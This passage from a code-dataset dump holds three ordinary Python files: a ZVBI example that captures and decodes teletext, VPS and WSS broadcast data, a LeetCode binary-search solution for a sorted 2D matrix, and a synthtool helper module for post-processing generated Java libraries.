"line_number": 47, "usage_type": "call"}, {"api_name": "data_utils.ordered_indices", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.random.RandomState", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 76, "usage_type": "attribute"}, {"api_name": "data_utils.num_tokens_vec_fn", "line_number": 91, "usage_type": "call"}, {"api_name": "data_utils.get_batches_indices", "line_number": 92, "usage_type": "call"}]}
+{"seq_id": "70867022249", "text": "import argparse\nimport sys\nimport re\nimport Zvbi\n\nopt = None\n\n#extern void\n#vbi_capture_set_log_fp (vbi_capture * capture,\n# FILE * fp)\n#extern vbi_bool vbi_capture_force_read_mode\n\n#\n# Dump\n#\n\ndef PIL(day, mon, hour, minute):\n return ((day << 15) + (mon << 11) + (hour << 6) + (minute << 0))\n\n\ndef dump_pil(pil):\n day = pil >> 15\n mon = (pil >> 11) & 0xF\n hour = (pil >> 6) & 0x1F\n minute = pil & 0x3F\n\n if pil == PIL(0, 15, 31, 63):\n print(\" PDC: Timer-control (no PDC)\")\n elif pil == PIL(0, 15, 30, 63):\n print(\" PDC: Recording inhibit/terminate\")\n elif pil == PIL(0, 15, 29, 63):\n print(\" PDC: Interruption\")\n elif pil == PIL(0, 15, 28, 63):\n print(\" PDC: Continue\")\n elif pil == PIL(31, 15, 31, 63):\n print(\" PDC: No time\")\n else:\n print(\" PDC: %05x, YYYY-%02d-%02d %02d:%02d\" %\n (pil, mon, day, hour, minute))\n\n\npr_label = \"\"\ntmp_label = \"\"\n\ndef decode_vps(buf):\n global pr_label\n global tmp_label\n\n if not opt.dump_vps:\n return\n\n print(\"\\nVPS:\")\n\n c = Zvbi.rev8(buf[1])\n\n if (c & 0x80):\n pr_label = tmp_label\n tmp_label = \"\"\n\n c &= 0x7F\n if (c >= 0x20) and (c < 0x7f):\n tmp_label += chr(c)\n else:\n tmp_label += '.'\n\n print(\" 3-10: %02x %02x %02x %02x %02x %02x %02x %02x (\\\"%s\\\")\" %\n (buf[0], buf[1], buf[2], buf[3], buf[4], buf[5], buf[6], buf[7], pr_label))\n\n pcs = buf[2] >> 6\n\n cni = ( ((buf[10] & 3) << 10)\n + ((buf[11] & 0xC0) << 2)\n + ((buf[8] & 0xC0) << 0)\n + (buf[11] & 0x3F))\n\n pil = ((buf[8] & 0x3F) << 14) + (buf[9] << 6) + (buf[10] >> 2)\n\n pty = buf[12]\n\n print(\" CNI: %04x PCS: %d PTY: %d \" % (cni, pcs, pty), end='')\n\n dump_pil(pil)\n\n\ndef decode_wss_625(buf):\n formats = (\n \"Full format 4:3, 576 lines\",\n \"Letterbox 14:9 centre, 504 lines\",\n \"Letterbox 14:9 top, 504 lines\",\n \"Letterbox 16:9 centre, 430 lines\",\n \"Letterbox 16:9 top, 430 lines\",\n \"Letterbox > 16:9 centre\",\n \"Full format 14:9 centre, 576 lines\",\n \"Anamorphic 16:9, 576 lines\"\n )\n subtitles = (\n \"none\",\n \"in active image area\",\n \"out of active image area\",\n \"\"\n )\n\n if opt.dump_wss:\n g1 = buf[0] & 15\n parity = g1\n parity ^= parity >> 2\n parity ^= parity >> 1\n g1 &= 7\n\n print(\"WSS PAL: \", end='')\n if not (parity & 1):\n print(\" \", end='')\n\n print((\"%s; %s mode; %s colour coding; %s helper; \"+\n \"reserved b7=%d; %s Teletext subtitles; \"+\n \"open subtitles: %s; %s surround sound; \"+\n \"copyright %s; copying %s\") %\n ( formats[g1],\n (\"film\" if (buf[0] & 0x10) else \"camera\"),\n (\"MA/CP\" if (buf[0] & 0x20) else \"standard\"),\n (\"modulated\" if (buf[0] & 0x40) else \"no\"),\n (buf[0] & 0x80) != 0,\n (\"have\" if (buf[1] & 0x01) else \"no\"),\n subtitles[(buf[1] >> 1) & 3],\n (\"have\" if (buf[1] & 0x08) else \"no\"),\n (\"asserted\" if (buf[1] & 0x10) else \"unknown\"),\n (\"restricted\" if (buf[1] & 0x20) else \"not restricted\")\n ))\n\n\ndef decode_wss_cpr1204(buf):\n if opt.dump_wss:\n poly = (1 << 6) + (1 << 1) + 1\n g = (buf[0] << 12) + (buf[1] << 4) + buf[2]\n crc = g | (((1 << 6) - 1) << (14 + 6))\n\n for j in range(14 + 6 - 1, -1, -1):\n if (crc & ((1 << 6) << j)):\n crc ^= poly << j\n\n print(\"WSS CPR >> g=%08x crc=%08x\" % (g, crc), file=sys.stderr)\n\n\ndef decode_sliced(sliced_buf):\n if opt.dump_sliced:\n print(\"Sliced time: %f\" % sliced_buf.timestamp)\n\n for data, slc_id, line in sliced_buf:\n print(\"%04x %3d > \" % (slc_id, line), end='')\n\n for d in data:\n print(\"%02x \" % d, end='')\n\n print(\" \", end='')\n\n astr = Zvbi.unpar_str(data, '.')\n astr = re.sub(r'[\\x00-\\x1F\\x7F]', '.', astr.decode('ISO-8859-1'))\n print(astr)\n\n for data, slc_id, line in sliced_buf:\n if slc_id == 0:\n pass # nop\n elif not (slc_id & Zvbi.VBI_SLICED_VPS) == 0:\n decode_vps(data)\n elif not (slc_id & Zvbi.VBI_SLICED_TELETEXT_B) == 0:\n pass # Use ./decode instead.\n elif not (slc_id & Zvbi.VBI_SLICED_CAPTION_525) == 0:\n pass # Use ./decode instead.\n elif not (slc_id & Zvbi.VBI_SLICED_CAPTION_625) == 0:\n pass # Use ./decode instead.\n elif not (slc_id & Zvbi.VBI_SLICED_WSS_625) == 0:\n decode_wss_625(data)\n elif not (slc_id & Zvbi.VBI_SLICED_WSS_CPR1204) == 0:\n decode_wss_cpr1204(data)\n else:\n print(\"Oops. Unhandled vbi service %08x\\n\" % slc_id, file=sys.stderr)\n\n#\n# Sliced, binary\n#\n\n# hysterical compatibility\nServiceWidth = {\n Zvbi.VBI_SLICED_TELETEXT_B: (42, 0),\n Zvbi.VBI_SLICED_CAPTION_625: (2, 1),\n Zvbi.VBI_SLICED_VPS: (13, 2),\n Zvbi.VBI_SLICED_WSS_625: (2, 3),\n Zvbi.VBI_SLICED_WSS_CPR1204: (3, 4),\n Zvbi.VBI_SLICED_CAPTION_525: (2, 7),\n}\n\nlast_ts = 0.0\n\ndef binary_sliced(sliced_buf):\n global last_ts\n\n ts = sliced_buf.timestamp - last_ts if (last_ts > 0.0) else 0.04\n outfile.write(bytes(\"%f\\n\" % ts, 'ascii'))\n\n outfile.write(bytes([len(sliced_buf)]))\n\n for data, slc_id, line in sliced_buf:\n if ServiceWidth.get(slc_id) and (ServiceWidth.get(slc_id)[0] > 0):\n outfile.write(bytes([ServiceWidth.get(slc_id)[1],\n line & 0xFF,\n line >> 8]))\n data_len = ServiceWidth.get(slc_id)[0]\n outfile.write(data[0 : data_len])\n last_ts = sliced_buf.timestamp\n\n outfile.flush()\n\n\ndef binary_ts_pes(packet, user_data=None):\n outfile.write(packet)\n outfile.flush()\n return 1\n\n\ndef mainloop(cap):\n dump = (opt.dump_wss or opt.dump_vps or opt.dump_sliced)\n err_cnt = 0\n\n while True:\n try:\n if opt.read:\n raw_buf, sliced_buf = cap.read(1000)\n else:\n raw_buf, sliced_buf = cap.pull(1000)\n err_cnt = 0\n except Zvbi.CaptureError as e:\n if not opt.ignore_error:\n print(\"Capture error:\", e, file=sys.stderr)\n err_cnt += 1 # ignore occasional singular errors\n if err_cnt >= 2:\n break\n continue\n except Zvbi.CaptureTimeout:\n if not opt.ignore_error:\n print(\"Capture timeout\", file=sys.stderr)\n continue\n\n if False:\n print(\".\", file=sys.stderr)\n sys.stderr.flush()\n\n if dump:\n decode_sliced(sliced_buf)\n\n if opt.sliced:\n binary_sliced(sliced_buf)\n\n if opt.pes or opt.ts:\n # XXX shouldn't use system time\n pts = int(sliced_buf.timestamp * 90000.0)\n services = (Zvbi.VBI_SLICED_TELETEXT_B |\n Zvbi.VBI_SLICED_VPS |\n Zvbi.VBI_SLICED_CAPTION_625 |\n Zvbi.VBI_SLICED_WSS_625)\n mx.feed(services, sliced_buf=sliced_buf, pts=pts)\n\n\n#static const char short_options[] = \"123cd:elnpr:stvPT\"\n\ndef ParseCmdOptions():\n global opt\n parser = argparse.ArgumentParser(description='ZVBI capturing example')\n parser.add_argument(\"--device\", type=str, default=\"/dev/dvb/adapter0/demux0\", help=\"Path to video capture device\") # dev_name,\n parser.add_argument(\"--pid\", type=int, default=0, help=\"Teletext channel PID for DVB\")\n parser.add_argument(\"--ignore-error\", action='store_true', default=False, help=\"Silently ignore device errors and timeout\")\n parser.add_argument(\"--dump-ttx\", action='store_true', default=False, help=\"Capture and dump teletext packets\")\n parser.add_argument(\"--dump-xds\", action='store_true', default=False, help=\"Capture and dump CC XDS packets\")\n parser.add_argument(\"--dump-cc\", action='store_true', default=False, help=\"Capture and dump CC packets\")\n parser.add_argument(\"--dump-wss\", action='store_true', default=False, help=\"Capture and dump WSS\")\n parser.add_argument(\"--dump-vps\", action='store_true', default=False, help=\"Capture and dump VPS data\")\n parser.add_argument(\"--dump-sliced\", action='store_true', default=False, help=\"Capture and all VBI services\")\n parser.add_argument(\"--pes\", action='store_true', default=False, help=\"Write output as PES DVB stream\") # bin_pes,\n parser.add_argument(\"--ts\", action='store_true', default=False, help=\"Write output as TS DVB stream\") # bin_ts,\n parser.add_argument(\"--sliced\", action='store_true', default=False, help=\"Write binary output, for piping into decode.py\") # bin_sliced,\n parser.add_argument(\"--read\", action='store_true', default=False, help=\"Use \\\"read\\\" capture method instead of \\\"pull\\\"\") # do_read,\n parser.add_argument(\"--strict\", type=int, default=0, help=\"Use strict mode 0,1,2 for adding VBI services\")\n #parser.add_argument(\"--desync\", action='store_true', default=False)\n #parser.add_argument(\"--sim\", action='store_true', default=False) # do_sim,\n parser.add_argument(\"--pal\", action='store_true', default=False, help=\"Assume PAL video norm (bktr driver only)\") # scanning_pal,\n parser.add_argument(\"--ntsc\", action='store_true', default=False, help=\"Assume NTSC video norm (bktr driver only)\") # scanning_ntsc,\n #parser.add_argument(\"--v4l\", action='store_true', default=False) # api_v4l,\n parser.add_argument(\"--v4l2\", action='store_true', default=False, help=\"Using analog driver interface\")\n #parser.add_argument(\"--v4l2-read\", action='store_true', default=False) # api_v4l2, # FIXME\n #parser.add_argument(\"--v4l2-mmap\", action='store_true', default=False) # api_v4l2, # FIXME\n parser.add_argument(\"--verbose\", action='store_true', default=False, help=\"Enable trace output in the library\")\n opt = parser.parse_args()\n\n if opt.v4l2 and (opt.pid != 0):\n print(\"Options --v4l2 and --pid are mutually exclusive\", file=sys.stderr)\n sys.exit(1)\n if not opt.v4l2 and (opt.pid == 0) and (\"dvb\" in opt.device):\n print(\"WARNING: DVB devices require --pid parameter\", file=sys.stderr)\n\n\ndef main_func():\n if opt.pal:\n scanning = 625\n elif opt.ntsc:\n scanning = 525\n else:\n scanning = 0\n\n dump = (opt.dump_wss or opt.dump_vps or opt.dump_sliced)\n\n if opt.dump_ttx or opt.dump_cc or opt.dump_xds:\n print(\"Teletext, CC and XDS decoding are no longer supported by this tool.\\n\" +\n \"Run ./capture --sliced | ./decode --ttx --cc --xds instead.\\n\", file=sys.stderr)\n exit(-1)\n\n if opt.sliced:\n if opt.pes or opt.ts or dump:\n print(\"WARNING: combining --sliced with --pes, --ts or --dump* will garble output\", file=sys.stderr)\n elif opt.pes or opt.ts:\n if opt.sliced or dump:\n print(\"WARNING: combining --pes/ts with --sliced or --dump* will garble output\", file=sys.stderr)\n\n services = (Zvbi.VBI_SLICED_VBI_525 |\n Zvbi.VBI_SLICED_VBI_625 |\n Zvbi.VBI_SLICED_TELETEXT_B |\n Zvbi.VBI_SLICED_CAPTION_525 |\n Zvbi.VBI_SLICED_CAPTION_625 |\n Zvbi.VBI_SLICED_VPS |\n Zvbi.VBI_SLICED_WSS_625 |\n Zvbi.VBI_SLICED_WSS_CPR1204)\n\n if False: #opt.sim:\n #TODO cap = Zvbi.sim_new (scanning, services, 0, !opt.desync)\n #par = cap.parameters()\n pass\n elif opt.v4l2 or (opt.pid == 0 and not \"dvb\" in opt.device):\n cap = Zvbi.Capture.Analog(opt.device, services=services, scanning=scanning,\n strict=opt.strict, trace=opt.verbose, buffers=5)\n par = cap.parameters()\n else:\n cap = Zvbi.Capture.Dvb(opt.device, dvb_pid=opt.pid, trace=opt.verbose)\n par = cap.parameters()\n\n if opt.verbose > 1:\n Zvbi.set_log_on_stderr(Zvbi.VBI_LOG_ERROR |\n Zvbi.VBI_LOG_WARNING |\n Zvbi.VBI_LOG_INFO)\n\n if opt.pid == -1:\n if par.sampling_format != Zvbi.VBI_PIXFMT_YUV420:\n print(\"Unexpected sampling format:%d in capture parameters\"\n % par.sampling_format, file=sys.stderr)\n exit(-1)\n\n global mx\n if opt.pes:\n mx = Zvbi.DvbMux(pes=True, callback=binary_ts_pes)\n mx.set_pes_packet_size (0, 8* 184)\n elif opt.ts:\n mx = Zvbi.DvbMux(ts_pid=999, callback=binary_ts_pes)\n mx.set_pes_packet_size (0, 8* 184)\n\n global outfile\n outfile = open(sys.stdout.fileno(), \"wb\")\n\n mainloop(cap)\n\n# main\ntry:\n ParseCmdOptions()\n main_func()\nexcept (KeyboardInterrupt, BrokenPipeError):\n pass\n", "repo_name": "tomzox/Python-ZVBI", "sub_path": "Video-ZVBI/examples/capture.py", "file_name": "capture.py", "file_ext": "py", "file_size_in_byte": 13041, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "Zvbi.rev8", "line_number": 54, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 141, "usage_type": "attribute"}, {"api_name": "Zvbi.unpar_str", "line_number": 156, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 157, "usage_type": "call"}, {"api_name": "Zvbi.VBI_SLICED_VPS", "line_number": 163, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_TELETEXT_B", "line_number": 165, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_CAPTION_525", "line_number": 167, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_CAPTION_625", "line_number": 169, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_WSS_625", "line_number": 171, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_WSS_CPR1204", "line_number": 173, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 176, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_TELETEXT_B", "line_number": 184, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_CAPTION_625", "line_number": 185, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_VPS", "line_number": 186, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_WSS_625", "line_number": 187, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_WSS_CPR1204", "line_number": 188, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_CAPTION_525", "line_number": 189, "usage_type": "attribute"}, {"api_name": "Zvbi.CaptureError", "line_number": 231, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 233, "usage_type": "attribute"}, {"api_name": "Zvbi.CaptureTimeout", "line_number": 238, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 240, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 244, "usage_type": "attribute"}, {"api_name": "sys.stderr.flush", "line_number": 245, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 245, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_TELETEXT_B", "line_number": 256, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_VPS", "line_number": 257, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_CAPTION_625", "line_number": 258, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_WSS_625", "line_number": 259, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 267, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 294, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 295, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 297, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 312, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 317, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 320, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_VBI_525", "line_number": 322, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_VBI_625", "line_number": 323, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_TELETEXT_B", "line_number": 324, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_CAPTION_525", "line_number": 325, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_CAPTION_625", "line_number": 326, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_VPS", "line_number": 327, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_WSS_625", "line_number": 328, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_WSS_CPR1204", "line_number": 329, "usage_type": "attribute"}, {"api_name": "Zvbi.Capture.Analog", "line_number": 336, "usage_type": "call"}, {"api_name": "Zvbi.Capture", "line_number": 336, "usage_type": "attribute"}, {"api_name": "Zvbi.Capture.Dvb", "line_number": 340, "usage_type": "call"}, {"api_name": "Zvbi.Capture", "line_number": 340, "usage_type": "attribute"}, {"api_name": "Zvbi.set_log_on_stderr", "line_number": 344, "usage_type": "call"}, {"api_name": "Zvbi.VBI_LOG_ERROR", "line_number": 344, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_LOG_WARNING", "line_number": 345, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_LOG_INFO", "line_number": 346, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_PIXFMT_YUV420", "line_number": 349, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 351, "usage_type": "attribute"}, {"api_name": "Zvbi.DvbMux", "line_number": 356, "usage_type": "call"}, {"api_name": "Zvbi.DvbMux", "line_number": 359, "usage_type": "call"}, {"api_name": "sys.stdout.fileno", "line_number": 363, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 363, "usage_type": "attribute"}]}
+{"seq_id": "74144779369", "text": "#\n# @lc app=leetcode.cn id=74 lang=python3\n#\n# [74] 搜索二维矩阵\n#\n# https://leetcode-cn.com/problems/search-a-2d-matrix/description/\n#\n# algorithms\n# Medium (41.15%)\n# Total Accepted: 91.5K\n# Total Submissions: 220.7K\n# Testcase Example: '[[1,3,5,7],[10,11,16,20],[23,30,34,60]]\\n3'\n#\n# 编写一个高效的算法来判断 m x n 矩阵中,是否存在一个目标值。该矩阵具有如下特性:\n#\n#\n# 每行中的整数从左到右按升序排列。\n# 每行的第一个整数大于前一行的最后一个整数。\n#\n#\n#\n#\n# 示例 1:\n#\n#\n# 输入:matrix = [[1,3,5,7],[10,11,16,20],[23,30,34,60]], target = 3\n# 输出:true\n#\n#\n# 示例 2:\n#\n#\n# ��入:matrix = [[1,3,5,7],[10,11,16,20],[23,30,34,60]], target = 13\n# 输出:false\n#\n#\n#\n#\n# 提示:\n#\n#\n# m == matrix.length\n# n == matrix[i].length\n# 1\n# -10^4\n#\n#\n#\nfrom typing import List\n\n\nclass Solution:\n def searchMatrix0(self, matrix: List[List[int]], target: int) -> bool:\n m, n = len(matrix), len(matrix[0])\n l, r = 0, m * n - 1\n while l <= r:\n mid = (l + r) // 2\n i, j = divmod(mid, n)\n if target < matrix[i][j]:\n r = mid - 1\n elif target > matrix[i][j]:\n l = mid + 1\n else:\n return True\n return False\n\n def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:\n m, n = len(matrix), len(matrix[0])\n l, r = 0, m - 1\n while l <= r:\n mid = (l + r) // 2\n if target < matrix[mid][0]:\n r = mid - 1\n elif target > matrix[mid][-1]:\n l = mid + 1\n else:\n # 二分的跳出,以l<=r为条件,mid就是最终结果\n break\n row = mid\n l, r = 0, n - 1\n while l <= r:\n mid = (l + r) // 2\n if target < matrix[row][mid]:\n r = mid - 1\n elif target > matrix[row][mid]:\n l = mid + 1\n else:\n return True\n return False\n\n\n# matrix = [[1, 3, 5, 7], [10, 11, 16, 20], [23, 30, 34, 60]]\n# matrix = [[1]]\n# target = 1\n\n# ret = Solution().searchMatrix(matrix, target)\n# print(ret)\n", "repo_name": "hedeqiang/leetcode-1", "sub_path": "python/74.search-a-2d-matrix.py", "file_name": "74.search-a-2d-matrix.py", "file_ext": "py", "file_size_in_byte": 2237, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.List", "line_number": 53, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 67, "usage_type": "name"}]}
+{"seq_id": "16093779050", "text": "import glob\nimport sys\nimport os\nimport re\nimport synthtool as s\nimport synthtool.gcp as gcp\nfrom pathlib import Path\nfrom synthtool.log import logger\nfrom synthtool import shell\n\nDEFAULT_FORMAT_VERSION = \"1.7\"\nGOOD_LICENSE = \"\"\"\n/*\n * Copyright 2020 Google LLC\n *\n * Licensed under the Apache License, Version 2.0 (the \"License\");\n * you may not use this file except in compliance with the License.\n * You may obtain a copy of the License at\n *\n * https://www.apache.org/licenses/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n */\n\"\"\"\nPROTOBUF_HEADER = \"// Generated by the protocol buffer compiler. DO NOT EDIT!\"\nBAD_LICENSE = \"\"\"/\\\\*\n \\\\* Copyright \\\\d{4} Google LLC\n \\\\*\n \\\\* Licensed under the Apache License, Version 2.0 \\\\(the \"License\"\\\\); you may not use this file except\n \\\\* in compliance with the License. You may obtain a copy of the License at\n \\\\*\n \\\\* http://www.apache.org/licenses/LICENSE-2.0\n \\\\*\n \\\\* Unless required by applicable law or agreed to in writing, software distributed under the License\n \\\\* is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express\n \\\\* or implied. See the License for the specific language governing permissions and limitations under\n \\\\* the License.\n \\\\*/\n\"\"\"\n\nimport time\n\ndef format_code(path: str, times: int = 2) -> None:\n \"\"\"\n Runs the google-java-format jar against all .java files found within the\n provided path.\n \"\"\"\n # Find all .java files in path and run the formatter on them\n files = list(glob.iglob(os.path.join(path, \"**/*.java\"), recursive=True))\n\n # Run the formatter as a jar file\n logger.info(\"Running java formatter on {} files\".format(len(files)))\n formatter_binary = sys.argv[2]\n for _ in range(times):\n shell.run([formatter_binary, \"--replace\"] + files)\n\ndef fix_proto_headers(proto_root: Path) -> None:\n s.replace(\n [proto_root / \"src/**/*.java\"],\n PROTOBUF_HEADER,\n f\"{GOOD_LICENSE}{PROTOBUF_HEADER}\",\n )\n # https://github.com/googleapis/gapic-generator/issues/3074\n s.replace(\n [proto_root / \"src/**/*Name.java\", proto_root / \"src/**/*Names.java\"],\n BAD_LICENSE,\n GOOD_LICENSE,\n )\n\n\ndef fix_grpc_headers(grpc_root: Path, package_name: str) -> None:\n s.replace(\n [grpc_root / \"src/**/*.java\"], \"^package (.*);\", f\"{GOOD_LICENSE}package \\\\1;\",\n )\n\ndef _common_generation(\n service: str,\n version: str,\n library: Path,\n package_pattern: str,\n suffix: str = \"\",\n destination_name: str = None,\n cloud_api: bool = True,\n diregapic: bool = False,\n):\n \"\"\"Helper function to execution the common generation cleanup actions.\n\n Fixes headers for protobuf classes and generated gRPC stub services. Copies\n code and samples to their final destinations by convention. Runs the code\n formatter on the generated code.\n\n Args:\n service (str): Name of the service.\n version (str): Service API version.\n library (Path): Path to the temp directory with the generated library.\n package_pattern (str): Package name template for fixing file headers.\n suffix (str, optional): Suffix that the generated library folder. The\n artman output differs from bazel's output directory. Defaults to \"\".\n destination_name (str, optional): Override the service name for the\n destination of the output code. Defaults to the service name.\n \"\"\"\n\n if destination_name is None:\n destination_name = service\n\n cloud_prefix = \"cloud-\" if cloud_api else \"\"\n package_name = package_pattern.format(service=service, version=version)\n fix_proto_headers(\n library / f\"proto-google-{cloud_prefix}{service}-{version}{suffix}\"\n )\n fix_grpc_headers(\n library / f\"grpc-google-{cloud_prefix}{service}-{version}{suffix}\", package_name\n )\n\n s.copy(\n [library / f\"gapic-google-{cloud_prefix}{service}-{version}{suffix}/src\"],\n f\"google-{cloud_prefix}{destination_name}/src\",\n required=True,\n )\n s.copy(\n [library / f\"grpc-google-{cloud_prefix}{service}-{version}{suffix}/src\"],\n f\"grpc-google-{cloud_prefix}{destination_name}-{version}/src\",\n # For REST-only clients, like java-compute, gRPC artifact does not exist\n required=(not diregapic),\n )\n s.copy(\n [library / f\"proto-google-{cloud_prefix}{service}-{version}{suffix}/src\"],\n f\"proto-google-{cloud_prefix}{destination_name}-{version}/src\",\n required=True,\n )\n\n format_code(f\"google-{cloud_prefix}{destination_name}/src\")\n format_code(f\"grpc-google-{cloud_prefix}{destination_name}-{version}/src\", 1)\n format_code(f\"proto-google-{cloud_prefix}{destination_name}-{version}/src\", 1)\n\n\ndef bazel_library(\n service: str,\n version: str,\n package_pattern: str = \"com.google.cloud.{service}.{version}\",\n gapic: gcp.GAPICBazel = None,\n destination_name: str = None,\n cloud_api: bool = True,\n diregapic: bool = False,\n **kwargs,\n) -> Path:\n \"\"\"Generate a Java library using the gapic-generator via bazel.\n\n Generates code into a temp directory, fixes missing header fields, and\n copies into the expected locations.\n\n Args:\n service (str): Name of the service.\n version (str): Service API version.\n package_pattern (str, optional): Package name template for fixing file\n headers. Defaults to \"com.google.cloud.{service}.{version}\".\n gapic (GAPICBazel, optional): Generator instance.\n destination_name (str, optional): Override the service name for the\n destination of the output code. Defaults to the service name.\n **kwargs: Additional options for gapic.java_library()\n\n Returns:\n The path to the temp directory containing the generated client.\n \"\"\"\n if gapic is None:\n gapic = gcp.GAPICBazel()\n\n library = gapic.java_library(\n service=service, version=version, diregapic=diregapic, **kwargs\n )\n\n cloud_prefix = \"cloud-\" if cloud_api else \"\"\n _common_generation(\n service=service,\n version=version,\n library=library / f\"google-{cloud_prefix}{service}-{version}-java\",\n package_pattern=package_pattern,\n suffix=\"-java\",\n destination_name=destination_name,\n cloud_api=cloud_api,\n diregapic=diregapic,\n )\n\n return library\n\ndef common_templates(**kwargs) -> None:\n pass\n\ndef custom_templates(**kwargs) -> None:\n pass\n\ndef remove_method(filename: str, signature: str):\n \"\"\"Helper to remove an entire method.\n\n Goes line-by-line to detect the start of the block. Determines\n the end of the block by a closing brace at the same indentation\n level. This requires the file to be correctly formatted.\n\n Example: consider the following class:\n\n class Example {\n public void main(String[] args) {\n System.out.println(\"Hello World\");\n }\n\n public String foo() {\n return \"bar\";\n }\n }\n\n To remove the `main` method above, use:\n\n remove_method('path/to/file', 'public void main(String[] args)')\n\n Args:\n filename (str): Path to source file\n signature (str): Full signature of the method to remove. Example:\n `public void main(String[] args)`.\n \"\"\"\n lines = []\n leading_regex = None\n with open(filename, \"r\") as fp:\n line = fp.readline()\n while line:\n # for each line, try to find the matching\n regex = re.compile(\"(\\\\s*)\" + re.escape(signature) + \".*\")\n match = regex.match(line)\n if match:\n leading_regex = re.compile(match.group(1) + \"}\")\n line = fp.readline()\n continue\n\n # not in a ignore block - preserve the line\n if not leading_regex:\n lines.append(line)\n line = fp.readline()\n continue\n\n # detect the closing tag based on the leading spaces\n match = leading_regex.match(line)\n if match:\n # block is closed, resume capturing content\n leading_regex = None\n\n line = fp.readline()\n\n with open(filename, \"w\") as fp:\n for line in lines:\n # print(line)\n fp.write(line)\n", "repo_name": "googleapis/rules_gapic", "sub_path": "synth/synthtool/languages/java.py", "file_name": "java.py", "file_ext": "py", "file_size_in_byte": 8642, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "53", "api": [{"api_name": "glob.iglob", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path", "line_number": 53, "usage_type": "attribute"}, {"api_name": "synthtool.log.logger.info", "line_number": 56, "usage_type": "call"}, {"api_name": "synthtool.log.logger", "line_number": 56, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 57, "usage_type": "attribute"}, {"api_name": "synthtool.shell.run", "line_number": 59, "usage_type": "call"}, {"api_name": "synthtool.shell", "line_number": 59, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 61, "usage_type": "name"}, {"api_name": "synthtool.replace", "line_number": 62, "usage_type": "call"}, {"api_name": "synthtool.replace", "line_number": 68, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 75, "usage_type": "name"}, {"api_name": "synthtool.replace", "line_number": 76, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 83, "usage_type": "name"}, {"api_name": "synthtool.copy", "line_number": 119, "usage_type": "call"}, {"api_name": "synthtool.copy", "line_number": 124, "usage_type": "call"}, {"api_name": "synthtool.copy", "line_number": 130, "usage_type": "call"}, {"api_name": "synthtool.gcp.GAPICBazel", "line_number": 145, "usage_type": "attribute"}, {"api_name": "synthtool.gcp", "line_number": 145, "usage_type": "name"}, {"api_name": "synthtool.gcp.GAPICBazel", "line_number": 170, "usage_type": "call"}, {"api_name": "synthtool.gcp", "line_number": 170, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 150, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 230, "usage_type": "call"}, {"api_name": "re.escape", "line_number": 230, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 233, "usage_type": "call"}]}
